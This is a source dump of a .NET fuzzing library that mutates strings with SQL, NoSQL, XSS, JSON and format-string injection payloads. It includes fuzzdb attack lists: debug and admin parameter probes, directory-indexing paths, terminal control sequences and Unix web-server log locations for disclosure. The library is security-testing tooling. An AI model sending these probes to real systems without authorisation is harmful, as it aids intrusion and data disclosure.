│ ├── BasicStringMutationTests.cs
│ ├── ControlCharsInjectiontests.cs
│ ├── FormatStringsInjection.cs
│ ├── JsonInjectionTests.cs
│ ├── ListMemberDuplicationTests.cs
│ ├── ManipulationsTests.csproj
│ ├── NoSqlInjectionTests.cs
│ ├── SqlInjectionTests.cs
│ ├── StringReplacementTests.cs
│ └── XssInjectionTests.cs
├── ModelFuzzer
├── Fuzzer
│ ├── DotnetModelFuzzer.csproj
│ ├── DotnetModelFuzzer.nuspec
│ ├── ManipulationCache.cs
│ ├── Model.cs
│ ├── Models
│ │ ├── HttpRequestModel.cs
│ │ ├── HttpRequestStrategy.cs
│ │ ├── KeyValuePairModel.cs
│ │ ├── KeyValuePairStrategy.cs
│ │ ├── ListModel.cs
│ │ ├── ListStrategy.cs
│ │ ├── StringModel.cs
│ │ └── StringStrategy.cs
│ ├── Strategy.cs
│ ├── Utilities.cs
│ └── XMLFile1.xml
└── FuzzerTests
│ ├── DotnetModelFuzzer.Tests.csproj
│ ├── FuzzerTests.cs
│ ├── HttpRequestFuzzingTest.cs
│ └── UtilitiesTest.cs
├── README.md
└── azure-pipelines.yml
/.github/workflows/dotnetcore.yml:
--------------------------------------------------------------------------------
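# CI build for the DotnetModelFuzzing solution: restores packages and compiles
# the Debug configuration on every push and pull request that targets main.
# NOTE(review): this workflow only builds; it has no step that runs the test projects.
name: .NET Core

on:
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

# Least privilege for the job's GITHUB_TOKEN: a build only needs to read the
# repository. Without this block the token falls back to the repository or
# organization default, which can include write scopes.
permissions:
  contents: read

jobs:
  build:

    runs-on: ubuntu-latest

    steps:
    # NOTE(review): both actions are referenced by mutable major-version tags.
    # Pinning each to a full commit SHA keeps a re-pointed tag from changing
    # what runs here; the SHAs are not recorded in this file.
    - uses: actions/checkout@v2
      with:
        # The job never pushes, so do not leave the token in the local git
        # config where later build steps (restore, MSBuild targets) could read it.
        persist-credentials: false
    - name: Setup .NET Core
      uses: actions/setup-dotnet@v1
      with:
        dotnet-version: 3.1.101
    - name: Install dependencies
      run: dotnet restore
    - name: Build
      run: dotnet build --configuration Debug --no-restore DotnetModelFuzzing.sln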
24 |
--------------------------------------------------------------------------------
/ExampleApp/ExampleApp.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Exe
5 | netcoreapp3.1
6 | ExampleApp.Program
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 | all
15 | runtime; build; native; contentfiles; analyzers; buildtransitive
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2019 Melissa Benya
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/CollectionManips/ListMemberDuplication.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 |
namespace DotnetModelFuzzer.Manipulations.CollectionManips
{
    /// <summary>
    /// List manipulation that appends a copy of one randomly chosen existing
    /// element to the end of the list.
    /// </summary>
    /// <typeparam name="T">Element type of the list being fuzzed.</typeparam>
    public class ListMemberDuplication<T> : Manipulation<List<T>>, IListManipulation<T>
    {
        /// <summary>Creates the manipulation with the base class's default setup.</summary>
        public ListMemberDuplication()
        {
        }

        /// <summary>Creates the manipulation, forwarding <paramref name="seed"/> to the base class.</summary>
        /// <param name="seed">Passed to the base constructor; presumably seeds <c>Random</c> so runs can be replayed (confirm in Manipulation.cs).</param>
        public ListMemberDuplication(int seed) : base(seed)
        {
        }

        /// <summary>
        /// Duplicates one element of <paramref name="input"/>.
        /// </summary>
        /// <param name="input">List to manipulate; may be null or empty.</param>
        /// <returns>
        /// The same list instance that was passed in. The list is modified in
        /// place, so callers that need the original must copy it first. A null
        /// or empty list is returned untouched.
        /// </returns>
        public override List<T> Manipulate(List<T> input)
        {
            // Nothing to duplicate: hand the argument back as-is.
            if (input == null || input.Count == 0)
            {
                return input;
            }

            var pick = Random.Next(0, input.Count);
            var duplicate = input[pick];
            input.Add(duplicate);

            return input;
        }
    }
}
28 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/IGenerationManipulation.cs:
--------------------------------------------------------------------------------
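namespace DotnetModelFuzzing.Manipulations
{
    /// <summary>
    /// Contract for a manipulation whose input argument is optional.
    /// </summary>
    /// <typeparam name="T">Type of the value the manipulation accepts and returns.</typeparam>
    public interface IGenerationManipulation<T>
    {
        /// <summary>
        /// Produces a value of type <typeparamref name="T"/>.
        /// </summary>
        /// <param name="input">Optional starting value; defaults to <c>default(T)</c> when omitted.</param>
        /// <returns>The manipulated or generated value.</returns>
        T Manipulate(T input = default);
    }
}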
8 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/IListManipulation.cs:
--------------------------------------------------------------------------------
1 | using System.Collections.Generic;
2 |
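namespace DotnetModelFuzzer.Manipulations
{
    /// <summary>
    /// Contract for a manipulation that takes a list and returns a list.
    /// </summary>
    /// <typeparam name="T">Element type of the list.</typeparam>
    public interface IListManipulation<T>
    {
        /// <summary>
        /// Manipulates <paramref name="input"/>.
        /// </summary>
        /// <param name="input">List to manipulate.</param>
        /// <returns>
        /// The manipulated list. The interface does not say whether this is the
        /// same instance as <paramref name="input"/>; check the implementation.
        /// </returns>
        List<T> Manipulate(List<T> input);
    }
}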
10 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/IManupulation.cs:
--------------------------------------------------------------------------------
namespace DotnetModelFuzzer.Manipulations
{
    /// <summary>
    /// Interface with no members. The spelling "IManupulation" is the declared
    /// public name and is kept as-is.
    /// </summary>
    public interface IManupulation
    {
    }
}
7 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/IMutationManipulation.cs:
--------------------------------------------------------------------------------
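namespace DotnetModelFuzzer.Manipulations
{
    /// <summary>
    /// Contract for a manipulation that requires an existing value as input.
    /// </summary>
    /// <typeparam name="T">Type of the value the manipulation accepts and returns.</typeparam>
    public interface IMutationManipulation<T>
    {
        /// <summary>
        /// Manipulates <paramref name="input"/>.
        /// </summary>
        /// <param name="input">Value to mutate; unlike the generation contract there is no default.</param>
        /// <returns>The mutated value.</returns>
        T Manipulate(T input);
    }
}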
8 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/StringManips/BasicStringGeneration.cs:
--------------------------------------------------------------------------------
1 | using DotnetModelFuzzing.Manipulations;
2 |
namespace DotnetModelFuzzer.Manipulations.StringManips
{
    /// <summary>
    /// Generation manipulation that returns a string of random length built by
    /// <c>GenerateRandomAsciiString</c>.
    /// </summary>
    public class BasicStringGeneration : Manipulation<string>, IGenerationManipulation<string>
    {
        /// <summary>Creates the manipulation with the base class's default setup.</summary>
        public BasicStringGeneration() : base()
        {
        }

        /// <summary>Creates the manipulation, forwarding <paramref name="seed"/> to the base class.</summary>
        /// <param name="seed">Passed to the base constructor; presumably seeds <c>Random</c> (confirm in Manipulation.cs).</param>
        public BasicStringGeneration(int seed) : base(seed)
        {
        }

        /// <summary>
        /// Generates a fresh string; <paramref name="input"/> is not read.
        /// </summary>
        /// <param name="input">Ignored.</param>
        /// <returns>
        /// The result of <c>GenerateRandomAsciiString</c> for a length drawn from
        /// <c>Random.Next(0, short.MaxValue)</c>, so a zero length can be requested.
        /// </returns>
        public override string Manipulate(string input = default)
        {
            var requestedLength = Random.Next(0, short.MaxValue);
            var generated = GenerateRandomAsciiString(requestedLength);
            return generated;
        }
    }
}
18 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/StringManips/BasicStringMutation.cs:
--------------------------------------------------------------------------------
1 | using System;
2 |
namespace DotnetModelFuzzer.Manipulations.StringManips
{
    /// <summary>
    /// Mutation manipulation that inserts a randomly generated string into the
    /// input at a random offset.
    /// </summary>
    public class BasicStringMutation : Manipulation<string>, IMutationManipulation<string>
    {
        /// <summary>Creates the manipulation with the base class's default setup.</summary>
        public BasicStringMutation() : base()
        {
        }

        /// <summary>Creates the manipulation, forwarding <paramref name="seed"/> to the base class.</summary>
        /// <param name="seed">Passed to the base constructor; presumably seeds <c>Random</c> (confirm in Manipulation.cs).</param>
        public BasicStringMutation(int seed) : base(seed)
        {
        }

        /// <summary>
        /// Inserts a generated string into <paramref name="input"/>.
        /// </summary>
        /// <param name="input">String to mutate; may be null or empty.</param>
        /// <returns>
        /// The generated string alone when <paramref name="input"/> is null or
        /// empty; otherwise <paramref name="input"/> with the generated string
        /// inserted at an offset drawn from <c>Random.Next(0, input.Length)</c>.
        /// </returns>
        public override string Manipulate(string input)
        {
            // The payload is generated before the null/empty check, so the random
            // source is consumed in the same order on every path.
            var payload = GenerateRandomAsciiString(Random.Next(1, short.MaxValue));

            // NOTE(review): if Random is a System.Random the upper bound is
            // exclusive, so the payload is never placed after the last character.
            return string.IsNullOrEmpty(input)
                ? payload
                : input.Insert(Random.Next(0, input.Length), payload);
        }
    }
}
24 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/StringManips/StringReplacement.cs:
--------------------------------------------------------------------------------
1 | using System;
2 |
namespace DotnetModelFuzzer.Manipulations.StringManips
{
    /// <summary>
    /// Mutation manipulation that generates a random string no longer than the
    /// input and hands both to <c>InsertString</c>.
    /// </summary>
    public class StringReplacement : Manipulation<string>, IMutationManipulation<string>
    {
        /// <summary>Creates the manipulation with the base class's default setup.</summary>
        public StringReplacement() : base()
        {
        }

        /// <summary>Creates the manipulation, forwarding <paramref name="seed"/> to the base class.</summary>
        /// <param name="seed">Passed to the base constructor; presumably seeds <c>Random</c> (confirm in Manipulation.cs).</param>
        public StringReplacement(int seed) : base(seed)
        {
        }

        /// <summary>
        /// Combines <paramref name="input"/> with a generated string.
        /// </summary>
        /// <param name="input">String to mutate; may be null or empty.</param>
        /// <returns>
        /// <paramref name="input"/> unchanged when it is null or empty; otherwise
        /// the result of <c>InsertString(input, generated)</c>.
        /// </returns>
        public override string Manipulate(string input = default)
        {
            if (!string.IsNullOrEmpty(input))
            {
                // Length request is Random.Next(1, input.Length + 1).
                var replacement = GenerateRandomAsciiString(Random.Next(1, input.Length + 1));

                // NOTE(review): the class is named "replacement" but delegates to
                // InsertString; whether characters are overwritten or only added
                // depends on that helper, which is defined outside this file.
                return InsertString(input, replacement);
            }

            return input;
        }
    }
}
22 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/VulnerabilityManips/ControlCharInjection.cs:
--------------------------------------------------------------------------------
1 | using System;
2 |
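namespace DotnetModelFuzzer.Manipulations.VulnerabilityManips
{
    /// <summary>
    /// Mutation manipulation that picks one entry from <c>ViableInputs</c> and
    /// hands it, with the input, to <c>InsertString</c>. Intended for exercising
    /// your own code's handling of control characters.
    /// </summary>
    // NOTE(review): the base type is written as FuzzDbManipulation (non-generic);
    // confirm against FuzzDbManipulation.cs, which is outside this file.
    public class ControlCharInjection : FuzzDbManipulation, IMutationManipulation<string>
    {
        // Passed to the base constructor; presumably selects the "control-chars"
        // payload directory of the bundled fuzzdb corpus (confirm in FuzzDbManipulation.cs).
        private const string BasePath = "control-chars";

        /// <summary>Creates the manipulation for the <c>control-chars</c> payload set.</summary>
        public ControlCharInjection() : base(BasePath)
        {
        }

        /// <summary>Creates the manipulation, forwarding <paramref name="seed"/> and the payload path to the base class.</summary>
        /// <param name="seed">Passed to the base constructor; presumably seeds <c>Random</c> so a run can be replayed.</param>
        public ControlCharInjection(int seed) : base(seed, BasePath)
        {
        }

        /// <summary>
        /// Combines <paramref name="input"/> with one randomly chosen payload.
        /// </summary>
        /// <param name="input">String to mutate.</param>
        /// <returns>
        /// The result of <c>InsertString(input, payload)</c>, or
        /// <paramref name="input"/> unchanged when no payloads are available.
        /// </returns>
        public override string Manipulate(string input)
        {
            // Same guard as JsonInjection: with a null or empty payload list the
            // indexer below would throw instead of leaving the input alone.
            if (ViableInputs == null || ViableInputs.Count == 0)
            {
                return input;
            }

            var attack = ViableInputs[Random.Next(0, ViableInputs.Count)];

            return InsertString(input, attack);
        }
    }
}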
25 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/VulnerabilityManips/FormatStringsInjection.cs:
--------------------------------------------------------------------------------
1 | using System;
2 |
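namespace DotnetModelFuzzer.Manipulations.VulnerabilityManips
{
    /// <summary>
    /// Mutation that picks a random entry from the payloads loaded for "format-strings"
    /// and passes it, with the input, to InsertString.
    /// </summary>
    public class FormatStringsInjection : FuzzDbManipulation, IMutationManipulation
    {
        // Payload location handed to the FuzzDbManipulation constructor
        // (presumably resolved under the bundled fuzzdb directory; confirm in the base class).
        private const string BasePath = "format-strings";

        /// <summary>Creates the mutation using the base class's default random source.</summary>
        public FormatStringsInjection() : base(BasePath)
        {
        }

        /// <summary>Creates the mutation, forwarding <paramref name="seed"/> to the base class.</summary>
        public FormatStringsInjection(int seed) : base(seed, BasePath)
        {
        }

        /// <summary>
        /// Mutates <paramref name="input"/> with one randomly selected payload.
        /// </summary>
        /// <param name="input">String to mutate.</param>
        /// <returns>
        /// The result of InsertString, or <paramref name="input"/> unchanged when no payloads are loaded.
        /// </returns>
        public override string Manipulate(string input)
        {
            // Same guard JsonInjection and SqlInjection use: with an empty or missing
            // payload list, indexing ViableInputs throws instead of yielding a test case.
            // NOTE(review): returning the input unchanged means a missing payload
            // directory produces no mutation and no signal; verify payload loading separately.
            if (ViableInputs == null || ViableInputs.Count == 0)
            {
                return input;
            }

            var attack = ViableInputs[Random.Next(0, ViableInputs.Count)];

            return InsertString(input, attack);
        }
    }
}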
25 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/VulnerabilityManips/JsonInjection.cs:
--------------------------------------------------------------------------------
1 | using System;
2 |
namespace DotnetModelFuzzer.Manipulations.VulnerabilityManips
{
    /// <summary>
    /// Mutation that picks a random entry from the payloads loaded for "json"
    /// and passes it, with the input, to InsertString.
    /// </summary>
    public class JsonInjection : FuzzDbManipulation, IMutationManipulation
    {
        // Payload location handed to the FuzzDbManipulation constructor
        // (presumably resolved under the bundled fuzzdb directory; confirm in the base class).
        private const string BasePath = "json";

        /// <summary>Creates the mutation using the base class's default random source.</summary>
        public JsonInjection() : base(BasePath) { }

        /// <summary>Creates the mutation, forwarding <paramref name="seed"/> to the base class.</summary>
        public JsonInjection(int seed) : base(seed, BasePath) { }

        /// <summary>
        /// Mutates <paramref name="input"/> with one randomly selected payload.
        /// </summary>
        /// <param name="input">String to mutate.</param>
        /// <returns>
        /// The result of InsertString, or <paramref name="input"/> unchanged when no payloads are loaded.
        /// </returns>
        public override string Manipulate(string input)
        {
            // NOTE(review): with no payloads the input comes back unmodified and nothing
            // is reported, so a missing payload directory silently disables this mutation.
            bool hasPayloads = ViableInputs != null && ViableInputs.Count != 0;
            if (!hasPayloads)
            {
                return input;
            }

            int pick = Random.Next(0, ViableInputs.Count);
            var attack = ViableInputs[pick];

            return InsertString(input, attack);
        }
    }
}
29 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/VulnerabilityManips/NoSqlInjection.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.IO;
3 |
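namespace DotnetModelFuzzer.Manipulations.VulnerabilityManips
{
    /// <summary>
    /// Mutation that picks a random entry from the payloads loaded for "no-sql-injection"
    /// and passes it, with the input, to InsertString.
    /// </summary>
    public class NoSqlInjection : FuzzDbManipulation, IMutationManipulation
    {
        // Payload location handed to the FuzzDbManipulation constructor; ends with the
        // platform's directory separator (how the base class resolves it is not shown here).
        private static readonly string BasePath = "no-sql-injection" + Path.DirectorySeparatorChar;

        /// <summary>Creates the mutation using the base class's default random source.</summary>
        public NoSqlInjection() : base(BasePath)
        {
        }

        /// <summary>Creates the mutation, forwarding <paramref name="seed"/> to the base class.</summary>
        public NoSqlInjection(int seed) : base(seed, BasePath)
        {
        }

        /// <summary>
        /// Mutates <paramref name="input"/> with one randomly selected payload.
        /// </summary>
        /// <param name="input">String to mutate.</param>
        /// <returns>
        /// The result of InsertString, or <paramref name="input"/> unchanged when no payloads are loaded.
        /// </returns>
        public override string Manipulate(string input)
        {
            // Same guard JsonInjection and SqlInjection use: with an empty or missing
            // payload list, indexing ViableInputs throws instead of yielding a test case.
            // NOTE(review): returning the input unchanged means a missing payload
            // directory produces no mutation and no signal; verify payload loading separately.
            if (ViableInputs == null || ViableInputs.Count == 0)
            {
                return input;
            }

            var attack = ViableInputs[Random.Next(0, ViableInputs.Count)];

            return InsertString(input, attack);
        }
    }
}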
26 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/VulnerabilityManips/SqlInjection.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.IO;
3 |
namespace DotnetModelFuzzer.Manipulations.VulnerabilityManips
{
    /// <summary>
    /// Mutation that picks a random entry from the payloads loaded for the
    /// "sql-injection/detect" set and passes it, with the input, to InsertString.
    /// </summary>
    public class SqlInjection : FuzzDbManipulation, IMutationManipulation
    {
        // "sql-injection<sep>detect<sep>" using the platform's directory separator;
        // handed to the FuzzDbManipulation constructor (resolution is not shown here).
        private static readonly string BasePath =
            $"sql-injection{Path.DirectorySeparatorChar}detect{Path.DirectorySeparatorChar}";

        /// <summary>Creates the mutation using the base class's default random source.</summary>
        public SqlInjection() : base(BasePath) { }

        /// <summary>Creates the mutation, forwarding <paramref name="seed"/> to the base class.</summary>
        public SqlInjection(int seed) : base(seed, BasePath) { }

        /// <summary>
        /// Mutates <paramref name="input"/> with one randomly selected payload.
        /// </summary>
        /// <param name="input">String to mutate.</param>
        /// <returns>
        /// The result of InsertString, or <paramref name="input"/> unchanged when no payloads are loaded.
        /// </returns>
        public override string Manipulate(string input)
        {
            // NOTE(review): with no payloads the input comes back unmodified and nothing
            // is reported, so a missing payload directory silently disables this mutation.
            bool hasPayloads = ViableInputs != null && ViableInputs.Count != 0;
            if (!hasPayloads)
            {
                return input;
            }

            int pick = Random.Next(0, ViableInputs.Count);
            var attack = ViableInputs[pick];

            return InsertString(input, attack);
        }
    }
}
31 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/VulnerabilityManips/XssInjection.cs:
--------------------------------------------------------------------------------
1 | using System;
2 |
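namespace DotnetModelFuzzer.Manipulations.VulnerabilityManips
{
    /// <summary>
    /// Mutation that picks a random entry from the payloads loaded for "xss"
    /// and passes it, with the input, to InsertString.
    /// </summary>
    public class XssInjection : FuzzDbManipulation, IMutationManipulation
    {
        // Payload location handed to the FuzzDbManipulation constructor
        // (presumably resolved under the bundled fuzzdb directory; confirm in the base class).
        private const string BasePath = "xss";

        // Names passed to the base constructor alongside BasePath; presumably files
        // under "xss" that should not be loaded as payloads (confirm in FuzzDbManipulation).
        private static readonly string[] ExcludedFiles = new[] { "html-event-attributes", "JHADDIX_XSS_WITH_CONTEXT.doc", "default-javascript-event-attributes" };

        /// <summary>Creates the mutation using the base class's default random source.</summary>
        public XssInjection() : base(BasePath, ExcludedFiles)
        {
        }

        /// <summary>Creates the mutation, forwarding <paramref name="seed"/> to the base class.</summary>
        public XssInjection(int seed) : base(seed, BasePath, ExcludedFiles)
        {
        }

        /// <summary>
        /// Mutates <paramref name="input"/> with one randomly selected payload.
        /// </summary>
        /// <param name="input">String to mutate.</param>
        /// <returns>
        /// The result of InsertString, or <paramref name="input"/> unchanged when no payloads are loaded.
        /// </returns>
        public override string Manipulate(string input)
        {
            // Same guard JsonInjection and SqlInjection use: with an empty or missing
            // payload list, indexing ViableInputs throws instead of yielding a test case.
            // NOTE(review): returning the input unchanged means a missing payload
            // directory produces no mutation and no signal; verify payload loading separately.
            if (ViableInputs == null || ViableInputs.Count == 0)
            {
                return input;
            }

            var attack = ViableInputs[Random.Next(0, ViableInputs.Count)];

            return InsertString(input, attack);
        }
    }
}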
26 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/base64encoder.ps1:
--------------------------------------------------------------------------------
1 |
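# Writes a "<file>.base64" companion next to every *.txt file under .\fuzzdb.
# Each companion holds the Base64 of the file's text encoded as UTF-8.
$files = Get-ChildItem "fuzzdb" -Recurse *.txt
foreach ($f in $files) {

    $outfile = $f.FullName + ".base64"

    echo $outfile

    # Read as UTF-8 explicitly. Windows PowerShell decodes BOM-less files with the
    # system ANSI code page by default, which double-encodes non-ASCII payloads:
    # the committed control-chars/imessage.txt.base64 decodes to mojibake instead of
    # the original byte sequence, so that test case no longer exercises its target.
    # The variable is $content, not $input: $input is a PowerShell automatic variable.
    $content = Get-Content $f.FullName -Raw -Encoding UTF8

    # -Raw yields $null for an empty file. Without this, the method calls below fail
    # and $base keeps the previous file's value, which would then be written out.
    if ($null -eq $content) { $content = "" }

    # Diagnostic output: whether the text contains LF / CR.
    $content.Contains("`n")
    $content.Contains("`r")

    $base = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($content))

    Set-Content -Path $outfile $base

}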
25 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/README.md:
--------------------------------------------------------------------------------
1 | FuzzDB Attack Patterns
2 |
3 | **WAF Evasion**
4 | * Regexp security Cheatsheet
5 | * Source: https://github.com/attackercan/regexp-security-cheatsheet/blob/master/README.md
6 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/business-logic/CommonDebugParamNames.txt:
--------------------------------------------------------------------------------
1 | 7357=1
2 | 7357=true
3 | 7357=y
4 | 7357=yes
5 | access=1
6 | access=true
7 | access=y
8 | access=yes
9 | adm=1
10 | adm1n=1
11 | adm1n=true
12 | adm1n=y
13 | adm1n=yes
14 | admin=1
15 | admin=true
16 | admin=y
17 | admin=yes
18 | adm=true
19 | adm=y
20 | adm=yes
21 | dbg=1
22 | dbg=true
23 | dbg=y
24 | dbg=yes
25 | debug=1
26 | debug=true
27 | debug=y
28 | debug=yes
29 | edit=1
30 | edit=true
31 | edit=y
32 | edit=yes
33 | grant=1
34 | grant=true
35 | grant=y
36 | grant=yes
37 | test=1
38 | test=true
39 | test=y
40 | test=yes
41 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/business-logic/CommonDebugParamNames.txt.base64:
--------------------------------------------------------------------------------
1 | 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
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/business-logic/CommonMethodNames.txt:
--------------------------------------------------------------------------------
1 | 0
2 | 1
3 | add
4 | admin
5 | alert
6 | alter
7 | auth
8 | authenticate
9 | append
10 | calc
11 | calculate
12 | cancel
13 | change
14 | check
15 | clear
16 | click
17 | clone
18 | close
19 | create
20 | crypt
21 | decrypt
22 | del
23 | delete
24 | demo
25 | disable
26 | dl
27 | download
28 | edit
29 | enable
30 | encrypt
31 | exec
32 | execute
33 | file
34 | focus
35 | get
36 | help
37 | initiate
38 | is
39 | list
40 | load
41 | ls
42 | make
43 | mod
44 | mode
45 | modify
46 | move
47 | new
48 | off
49 | on
50 | open
51 | post
52 | proxy
53 | pull
54 | put
55 | query
56 | read
57 | remove
58 | rename
59 | reset
60 | retrieve
61 | run
62 | save
63 | search
64 | send
65 | shell
66 | show
67 | snd
68 | subtract
69 | test
70 | to
71 | toggle
72 | update
73 | upload
74 | verify
75 | view
76 | vrfy
77 | with
78 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/business-logic/CommonMethodNames.txt.base64:
--------------------------------------------------------------------------------
1 | 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
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/business-logic/DebugParams.Json.fuzz.txt:
--------------------------------------------------------------------------------
1 | "7357":1
2 | "7357":true
3 | "7357":"y"
4 | "7357":yes"
5 | "access":1
6 | "access":true
7 | "access":"y"
8 | "access":"yes"
9 | "adm":1
10 | "adm":true
11 | "adm":"y"
12 | "adm":"yes"
13 | "adm1n":1
14 | "adm1n":true
15 | "adm1n":y"
16 | "adm1n":"yes"
17 | "admin":1
18 | "admin":true
19 | "admin":"y"
20 | "admin":"yes"
21 | "adm":1
22 | "adm":true
23 | "adm":"y"
24 | "adm":"yes"
25 | "dbg":1
26 | "dbg":true
27 | "dbg":"y"
28 | "dbg":"yes"
29 | "debug":1
30 | "debug":true
31 | "debug":"y"
32 | "debug":"yes"
33 | "edit":1
34 | "edit":true
35 | "edit":"y"
36 | "edit":"yes"
37 | "grant":1
38 | "grant":true
39 | "grant":"y"
40 | "grant":"yes"
41 | "test":1
42 | "test":true
43 | "test":"y"
44 | "test":"yes"
45 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/business-logic/DebugParams.Json.fuzz.txt.base64:
--------------------------------------------------------------------------------
1 | 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
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/control-chars/imessage.txt:
--------------------------------------------------------------------------------
1 | Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/control-chars/imessage.txt.base64:
--------------------------------------------------------------------------------
1 | UG93ZXLDmeKAnsOZwo/DmeKAnsOZwo/DmMK1w5nigJjDmMKow5nCj8OZ4oCew5nCj8OZ4oCew5jCtcOZ4oCYw5jCqMOZwo/DmMKxw5jCscOZ4oC5IMOgwqXCoyDDoMKlwqNoIMOgwqXCoyDDoMKlwqPDpeKAoOKAlA0K
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/control-chars/terminal-escape-codes.txt:
--------------------------------------------------------------------------------
1 | Roses are [0;31mred[0m, violets are [0;34mblue. Hope you enjoy terminal hue
2 | But now...[20Cfor my greatest trick...[8m
3 | The quick brown fox... [Beeeep]
4 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/control-chars/terminal-escape-codes.txt.base64:
--------------------------------------------------------------------------------
1 | Um9zZXMgYXJlIBtbMDszMW1yZWQbWzBtLCB2aW9sZXRzIGFyZSAbWzA7MzRtYmx1ZS4gSG9wZSB5b3UgZW5qb3kgdGVybWluYWwgaHVlCkJ1dCBub3cuLi4bWzIwQ2ZvciBteSBncmVhdGVzdCB0cmljay4uLhtbOG0KVGhlIHF1aWMICAgICAhrIGJyb3duIGZvBwcHBwcHBwcHBwd4Li4uIFtCZWVlZXBdCg==
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/disclosure-directory/directory-indexing-generic.txt:
--------------------------------------------------------------------------------
1 | /%3f.jsp
2 | /?M=D
3 | /?S=D
4 | ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
5 | /cgi-bin/test-cgi?/*
6 | /cgi-bin/test-cgi?*
7 | /%00/
8 | /%2e/
9 | /%2f/
10 | /%5c/
11 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/disclosure-directory/directory-indexing-generic.txt.base64:
--------------------------------------------------------------------------------
1 | LyUzZi5qc3ANCi8/TT1EDQovP1M9RCANCi8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vDQovY2dpLWJpbi90ZXN0LWNnaT8vKg0KL2NnaS1iaW4vdGVzdC1jZ2k/Kg0KLyUwMC8NCi8lMmUvDQovJTJmLw0KLyU1Yy8NCg==
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/disclosure-localpaths/unix/common-unix-httpd-log-locations.txt:
--------------------------------------------------------------------------------
1 | /apache/logs/error.log
2 | /apache/logs/access.log
3 | /apache/logs/error.log
4 | /apache/logs/access.log
5 | /apache/logs/error.log
6 | /apache/logs/access.log
7 | /etc/httpd/logs/acces_log
8 | /etc/httpd/logs/acces.log
9 | /etc/httpd/logs/error_log
10 | /etc/httpd/logs/error.log
11 | /var/www/logs/access_log
12 | /var/www/logs/access.log
13 | /usr/local/apache/logs/access_log
14 | /usr/local/apache/logs/access.log
15 | /var/log/apache/access_log
16 | /var/log/apache2/access_log
17 | /var/log/apache/access.log
18 | /var/log/apache2/access.log
19 | /var/log/access_log
20 | /var/log/access.log
21 | /var/www/logs/error_log
22 | /var/www/logs/error.log
23 | /usr/local/apache/logs/error_log
24 | /usr/local/apache/logs/error.log
25 | /var/log/apache/error_log
26 | /var/log/apache2/error_log
27 | /var/log/apache/error.log
28 | /var/log/apache2/error.log
29 | /var/log/error_log
30 | /var/log/error.log
31 |
--------------------------------------------------------------------------------
